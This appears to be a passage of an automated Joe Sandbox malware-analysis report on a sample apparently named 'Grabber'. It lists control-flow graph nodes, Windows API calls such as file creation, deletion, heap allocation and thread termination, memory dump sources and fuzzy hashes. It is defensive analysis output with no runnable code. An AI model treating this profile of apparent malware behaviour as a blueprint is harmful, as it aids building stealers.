                                                                                                                                                                                                                          • API ID: Value$ErrorLastLibrary$AllocateEnumFileFreeHeapLoadModuleNameResourceTypesmemmovewcscmpwcslen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 983379767-0

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetFilePointer.KERNELBASE(?,?,?,00000001), ref: 0040B058
                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?,?,00000001), ref: 0040B092
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FilePointermemcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1104741977-0
                                                                                                                                                                                                                          • Opcode ID: 01662b736399dd0210b3166c1eac24a2b1f7f8f1802043f53fe0b6834fe756e1
                                                                                                                                                                                                                          • Instruction ID: 223037c69186752c1411635bf46ae5d03fa463101b4e1ddb65380de8071f5603
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 01662b736399dd0210b3166c1eac24a2b1f7f8f1802043f53fe0b6834fe756e1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 93313A392047019FC320DF29D844E5BB7E1EFD4314F04882EE59A97750D335E919CBA6

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          control_flow_graph 767 40dec0-40dee7 TlsGetValue 768 40df06-40df25 RtlReAllocateHeap 767->768 769 40dee9-40df04 RtlAllocateHeap 767->769 770 40df27-40df4d call 40e3a0 768->770 769->770
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(02190000,00000000,?), ref: 0040DEF9
                                                                                                                                                                                                                          • RtlReAllocateHeap.NTDLL(02190000,00000000,?,?), ref: 0040DF1C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocateHeap$Value
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2497967046-0
                                                                                                                                                                                                                          • Opcode ID: 391403ca008f830686c32838620f38fbd141f2e22e04a7bef1baef16fc724d55
                                                                                                                                                                                                                          • Instruction ID: 93a72ebc0765164a1c418c05f64e83f02c193a946cd328b9657e87a1490d81f0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 391403ca008f830686c32838620f38fbd141f2e22e04a7bef1baef16fc724d55
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F111B974A00208EFCB04DF98D894E9ABBB6FF88314F20C159F9099B355D735AA41DB94

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          control_flow_graph 773 40a6c5-40a6d2 774 40a6d4-40a706 wcsncpy wcslen 773->774 775 40a73d 773->775 776 40a71e-40a726 774->776 777 40a73f-40a742 775->777 778 40a708-40a70f 776->778 779 40a728-40a73b CreateDirectoryW 776->779 780 40a711-40a714 778->780 781 40a71b 778->781 779->777 780->781 782 40a716-40a719 780->782 781->776 782->779 782->781
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateDirectorywcslenwcsncpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 961886536-0
                                                                                                                                                                                                                          • Opcode ID: cc8a7ec8d54b194b434c4abf9ee5240936a68a416eca0cc9abdb5220f9513762
                                                                                                                                                                                                                          • Instruction ID: 5eb92d4f139d310a1ce384b3b75a423d404f976685da56e70024377017fd7883
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc8a7ec8d54b194b434c4abf9ee5240936a68a416eca0cc9abdb5220f9513762
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E0167B180131896CB24DB64CC8DEBA73B8DF04304F6086BBE415E71D1E779DAA4DB5A

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          control_flow_graph 783 408dee-408e26 memset InitCommonControlsEx CoInitialize
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00408DFB
                                                                                                                                                                                                                          • InitCommonControlsEx.COMCTL32(00000008,00001000), ref: 00408E15
                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00408E1D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CommonControlsInitInitializememset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2179856907-0
                                                                                                                                                                                                                          • Opcode ID: 91c7401402fa2f0ea5928b71181181df8ef358baa4c0a6ad788b24867e7e8746
                                                                                                                                                                                                                          • Instruction ID: d18f3e268914b4fee2ab689e9e6bda8f6ab82eec5aee9dd7765ec6ce908ab83c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 91c7401402fa2f0ea5928b71181181df8ef358baa4c0a6ad788b24867e7e8746
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12E08CB088430CBBEB009BD0DC0EF8DBB7CEB00315F0041A4F904A2280EBB466488B95

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          control_flow_graph 784 4098c0-4098c5 785 4098c7-4098cd 784->785 786 4098df 784->786 787 4098d4-4098d9 SetEnvironmentVariableW 785->787 788 4098cf 785->788 787->786 788->787
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetEnvironmentVariableW.KERNELBASE(02199F70,02199F70,00404434,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004098D9
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: EnvironmentVariable
                                                                                                                                                                                                                          • String ID: $0A
                                                                                                                                                                                                                          • API String ID: 1431749950-513306843
                                                                                                                                                                                                                          • Opcode ID: 1c567db1f8ae5e831e25467e71350c4bb5df89e506d1786ab4261c5f7a60237e
                                                                                                                                                                                                                          • Instruction ID: a83057451cf148fd94e5dae0918d05dd15dd477b401c26288c9a060c20ad275f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c567db1f8ae5e831e25467e71350c4bb5df89e506d1786ab4261c5f7a60237e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7C01231619201BBD710EA14C904B57BBE5EB50345F04C439B044912B0C338CC44D705

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          control_flow_graph 789 40adc0-40add9 call 40d498 792 40ae6e-40ae73 789->792 793 40addf-40adfe CreateFileW 789->793 794 40ae00-40ae02 793->794 795 40ae52-40ae55 793->795 794->795 796 40ae04-40ae0b 794->796 797 40ae57 795->797 798 40ae59-40ae60 call 40d40a 795->798 800 40ae20 796->800 801 40ae0d-40ae1e HeapAlloc 796->801 797->798 802 40ae65-40ae6b 798->802 803 40ae23-40ae4a 800->803 801->803 804 40ae4c 803->804 805 40ae4e-40ae50 803->805 804->805 805->795 805->802
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040D498: EnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040ADD5,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000), ref: 0040D4A3
                                                                                                                                                                                                                            • Part of subcall function 0040D498: LeaveCriticalSection.KERNEL32(00000020,?,00000000,0040ADD5,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040D51E
                                                                                                                                                                                                                          • CreateFileW.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000080,00000000,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000), ref: 0040ADF3
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,00001000,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000,00000000,00000800), ref: 0040AE15
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$AllocCreateEnterFileHeapLeave
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3705299215-0
                                                                                                                                                                                                                          • Opcode ID: e305dac00e43d1f01632c500e63f0068ba79cd60e0177f680cb6723e5d67acda
                                                                                                                                                                                                                          • Instruction ID: 12139a0eb1477c71ece9156acb4b07c5ee84e209973367f4cf7a68f803bf58ce
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e305dac00e43d1f01632c500e63f0068ba79cd60e0177f680cb6723e5d67acda
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1119331140300ABC2305F1AEC44B57BBF9EB85764F14863EF5A5A73E0C7759C158BA9

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          control_flow_graph 806 40dbca-40dbe1 call 40dd1d 809 40dbe7-40dc04 RtlAllocateHeap 806->809 810 40dc69-40dc6e 806->810 811 40dc06-40dc4c memset call 411a64 809->811 812 40dc68 809->812 811->812 815 40dc4e-40dc50 811->815 812->810 815->812 816 40dc52-40dc54 815->816 817 40dc58-40dc62 call 411e8f 816->817 820 40dc64 817->820 820->812
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040DD1D: HeapFree.KERNEL32(00000000,-00000018,00000200,00000000,0040DBDB,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417080,00418098,00000004), ref: 0040DD5E
                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,FFFFFFDD,?,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070), ref: 0040DBFA
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040DC35
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$AllocateFreememset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2774703448-0
                                                                                                                                                                                                                          • Opcode ID: 5a98dcc60eb41190d4dd3f8e51887e861c9e07386c3483abd70395c86239bf10
                                                                                                                                                                                                                          • Instruction ID: c1bdd2e89517895a38d7a8cc2bcc280f97e8981c2924b00dcd90f9207400bfe8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a98dcc60eb41190d4dd3f8e51887e861c9e07386c3483abd70395c86239bf10
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E51167729043149BC320DF59DC80A8BBBE8EF88B10F01492EB988A7351D774E804CBA5
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7
                                                                                                                                                                                                                          • RemoveDirectoryW.KERNEL32(00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002,00000000,00000000,00417024,00000001,00000000), ref: 00402000
                                                                                                                                                                                                                          • RemoveDirectoryW.KERNEL32(00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002,00000000,00000000,00417024,00000001,00000000), ref: 0040200B
                                                                                                                                                                                                                            • Part of subcall function 004053C7: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,00401FC5,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002,00000000), ref: 004053D7
                                                                                                                                                                                                                            • Part of subcall function 00405436: TerminateThread.KERNEL32(00000000,00000000,00000000,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000), ref: 00405446
                                                                                                                                                                                                                            • Part of subcall function 00405436: EnterCriticalSection.KERNEL32(004186A8,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405452
                                                                                                                                                                                                                            • Part of subcall function 00405436: LeaveCriticalSection.KERNEL32(004186A8,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405486
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalDirectoryRemoveSection$EnterLeaveObjectSingleTerminateThreadValueWait
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1205394408-0
                                                                                                                                                                                                                          • Opcode ID: cbf9c02a299cce853fa8afa1118c476f8ea06bf817103c663cdc69cc5dfa62d5
                                                                                                                                                                                                                          • Instruction ID: f8114c552bbb016f0a76c43bd4124e9f0fb198a1ce0b642fe03d48e839951556
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cbf9c02a299cce853fa8afa1118c476f8ea06bf817103c663cdc69cc5dfa62d5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36F0C030414505AADA257B32EC8299A7E36EB08308B42C43FF440714F2CF3E9D69AE5D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00401053,00000000,00001000,00000000,00000000), ref: 0040DE3C
                                                                                                                                                                                                                          • TlsAlloc.KERNEL32(?,00401053,00000000,00001000,00000000,00000000), ref: 0040DE47
                                                                                                                                                                                                                            • Part of subcall function 0040E6A0: HeapAlloc.KERNEL32(02190000,00000000,0000000C,?,?,0040DE57,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E6AE
                                                                                                                                                                                                                            • Part of subcall function 0040E6A0: HeapAlloc.KERNEL32(02190000,00000000,00000010,?,?,0040DE57,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E6C2
                                                                                                                                                                                                                            • Part of subcall function 0040E6A0: TlsSetValue.KERNEL32(0000000D,00000000,?,?,0040DE57,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E6EB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocHeap$CreateValue
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 493873155-0
                                                                                                                                                                                                                          • Opcode ID: f31918e335419563cb91e7816fe34751be6fcb3fb2708b1ef5dadcb8cb13decf
                                                                                                                                                                                                                          • Instruction ID: f6fb69b35e6ce2edff263c55ffd8902d3e18a9f91630c6f11d167ca4d15ccc07
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f31918e335419563cb91e7816fe34751be6fcb3fb2708b1ef5dadcb8cb13decf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4ED012309C8304ABE7402FB1BC0A7843B789708765F604835F509572D1D9BA6090495C
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(00000002,00000080,0040A7F2,02199F70,00000000,00401FDF,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000), ref: 0040A7D0
                                                                                                                                                                                                                          • DeleteFileW.KERNELBASE(00000000,0040A7F2,02199F70,00000000,00401FDF,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 0040A7DA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$AttributesDelete
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2910425767-0
                                                                                                                                                                                                                          • Opcode ID: d362f7088f03a7c0c281f2bbae1f9f88548ac7f83f4d98d140da13098a0d0c91
                                                                                                                                                                                                                          • Instruction ID: f7dd43ce8ab679ab9acf2fbd66ade7664d9bbbd5be98dbe0a51a073a4b2bc51f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d362f7088f03a7c0c281f2bbae1f9f88548ac7f83f4d98d140da13098a0d0c91
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00D09E30408300B6D7555B20C90D75ABAF17F84745F14C43AF485514F1D7798C65E70A
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapDestroy.KERNELBASE(02190000,?,004011AF,00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098), ref: 0040DE69
                                                                                                                                                                                                                          • TlsFree.KERNELBASE(0000000D,?,004011AF,00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098), ref: 0040DE76
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DestroyFreeHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3293292866-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,00000000,00000000,?,?,004033E8,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000), ref: 0040AA13
                                                                                                                                                                                                                          • CloseHandle.KERNELBASE(00000000,00000000,?,?,004033E8,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000,00000000,00000800), ref: 0040AA1B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseFreeHandleHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1642312469-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7
                                                                                                                                                                                                                            • Part of subcall function 00409BA0: RtlAllocateHeap.NTDLL(00000008,00000000,00402F00,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000,00000000,00000000), ref: 00409BB1
                                                                                                                                                                                                                          • GetShortPathNameW.KERNEL32(02199F70,02199F70,00002710), ref: 00402C34
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                                                                                                                                                                                                            • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                                                                                                                                                                                                            • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02190000,00000000,?), ref: 0040DEF9
                                                                                                                                                                                                                            • Part of subcall function 00409B80: HeapFree.KERNEL32(00000000,00000000,00401B6B,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,?,00000000,?,00000000,00000000), ref: 00409B8C
                                                                                                                                                                                                                            • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                                                                                                                                                                                                                            • Part of subcall function 00405170: TlsGetValue.KERNEL32(?,?,00402FED,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000), ref: 00405178
                                                                                                                                                                                                                            • Part of subcall function 0040DF50: HeapFree.KERNEL32(02190000,00000000,00000000,?,00000000,?,00411DE4,00000000,00000000,-00000008), ref: 0040DF68
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HeapValue$AllocateErrorFreeLast$NamePathShortwcslen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 192546213-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,?,0040AA08,00000000,00000000,?,?,004033E8,00000000,00000000,00000800), ref: 0040AA67
                                                                                                                                                                                                                          Memory Dump Source
